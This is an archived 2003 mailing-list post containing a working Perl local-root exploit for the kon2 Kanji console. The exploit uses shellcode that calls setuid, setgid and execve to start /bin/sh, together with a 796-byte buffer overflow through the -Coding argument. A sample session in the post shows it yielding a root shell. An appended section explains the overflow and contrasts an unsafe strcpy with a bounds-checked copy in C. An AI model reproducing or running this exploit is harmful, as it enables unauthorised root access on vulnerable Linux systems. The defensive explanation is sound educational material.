kon2 exploit!!

From: wsxz (wsxzat_private)
Date: Tue Jun 03 2003 - 15:07:24 PDT


     I looked at the kon2 source and the -Console arg is the problem,
    so here goes the PoC.
    
    
    ----cut here--------
    
    #!/usr/bin/perl
    ####################################################################################
    #Priv8security.com kon2 version 0.3.9b-16 and < local root exploit.
    #
    #    Tested on Redhat 8.0. should work on 9.0 and 7.3
    #    Bug happens on -Coding arg.
    #    Based on Redhat Advisory.
    #
    #    [wsxz@localhost buffer]$ perl priv8kon.pl
    #    -=[ Priv8security.com kon local root exploit ]=-
    #    usage: priv8kon.pl offset
    #    [+] Using ret shellcode 0xbfffffc6
    #    Kanji ON Console ver.0.3.9 (2000/04/09)
    #
    #    KON> video type 'VGA' selected
    #    KON> hardware scroll mode.
    #    sh-2.05b# id
    #    uid=0(root) gid=0(root) groups=500(wsxz)
    ####################################################################################
    
    
    $shellcode =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69".
    "\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
    
    $path = "/usr/bin/kon";
    $ret = 0xbffffffa - length($shellcode) - length($path);
    
    $offset = $ARGV[0];
    
    print "-=[ Priv8security.com kon2 local root exploit ]=-\n";
    print "usage: $0 offset\n";
    printf("[+] Using ret shellcode 0x%x\n",$ret + $offset);
    
    $new_retword = pack('l', ($ret + $offset));
    $buffer2 = "A" x 796;
    $buffer2 .= $new_retword;
    $buffer = $shellcode;
    local($ENV{'WSXZ'}) = $buffer;
    exec("$path -Coding $buffer2");
    
    -----cut here-------
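The bug class behind this PoC is a command-line option value (the `-Coding` argument, passed here as 796 bytes of padding plus a 4-byte return address) copied into a fixed-size stack buffer with no length check, inside a setuid-root program. The following C example is added here and is not kon2's code or the poster's; the function names (`coding_unsafe`, `coding_safe`, `handle_coding_option`) and the buffer size `CODING_MAX` are assumptions chosen for illustration. It shows the unsafe copy pattern next to a hardened form that validates the length and rejects oversized input instead of truncating or overflowing.

```c
/* Added example (not kon2's source): unsafe option-argument copy vs. a
 * bounds-checked replacement. Names and CODING_MAX are assumed values. */
#include <stdio.h>
#include <string.h>

#define CODING_MAX 32   /* assumed size of the encoding-name buffer */

/* Vulnerable pattern: strcpy() trusts whatever length argv carries.
 * A value of CODING_MAX bytes or more runs past 'name' and clobbers the
 * saved return address, which is what the PoC above relies on.
 * Kept only for contrast; it is never called with long input here. */
int coding_unsafe(const char *arg)
{
    char name[CODING_MAX];
    strcpy(name, arg);              /* no bound check: overflow if strlen(arg) >= CODING_MAX */
    return (int)strlen(name);
}

/* Hardened form: find the terminator within the destination size first,
 * reject anything that does not fit (with room for the NUL), then copy.
 * Returns 0 on success, -1 when the argument is rejected. */
int coding_safe(const char *arg, char *out, size_t outsz)
{
    const char *end;
    size_t n;

    if (arg == NULL || out == NULL || outsz == 0)
        return -1;
    end = memchr(arg, '\0', outsz); /* only scan as far as the buffer could hold */
    if (end == NULL)                /* no NUL within outsz bytes: too long, refuse it */
        return -1;
    n = (size_t)(end - arg);
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;
}

/* How a privileged program should treat the "-Coding" option: validate,
 * fail loudly on bad input, and never let the caller pick the length. */
int handle_coding_option(const char *arg)
{
    char name[CODING_MAX];

    if (coding_safe(arg, name, sizeof name) != 0) {
        fprintf(stderr, "-Coding: argument missing or too long (max %d bytes)\n",
                CODING_MAX - 1);
        return 1;
    }
    printf("coding set to '%s'\n", name);
    return 0;
}

int main(int argc, char **argv)
{
    /* Constructed input: 800 'A's, comparable to the PoC's 796-byte padding. */
    char long_arg[801];
    memset(long_arg, 'A', 800);
    long_arg[800] = '\0';

    if (argc > 1)
        return handle_coding_option(argv[1]);

    handle_coding_option("EUC");          /* short value: accepted */
    return handle_coding_option(long_arg); /* oversized value: rejected, returns 1 */
}
```

The hardened version deliberately rejects rather than truncates: silently cutting an encoding name to 31 bytes would hide the bad input and can still leave the program selecting the wrong setting. In a setuid binary the length check is only the first layer; the option parser should also run before any privileged work, and the program should drop root as early as it can.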
    



    This archive was generated by hypermail 2b30 : Wed Jun 04 2003 - 08:36:52 PDT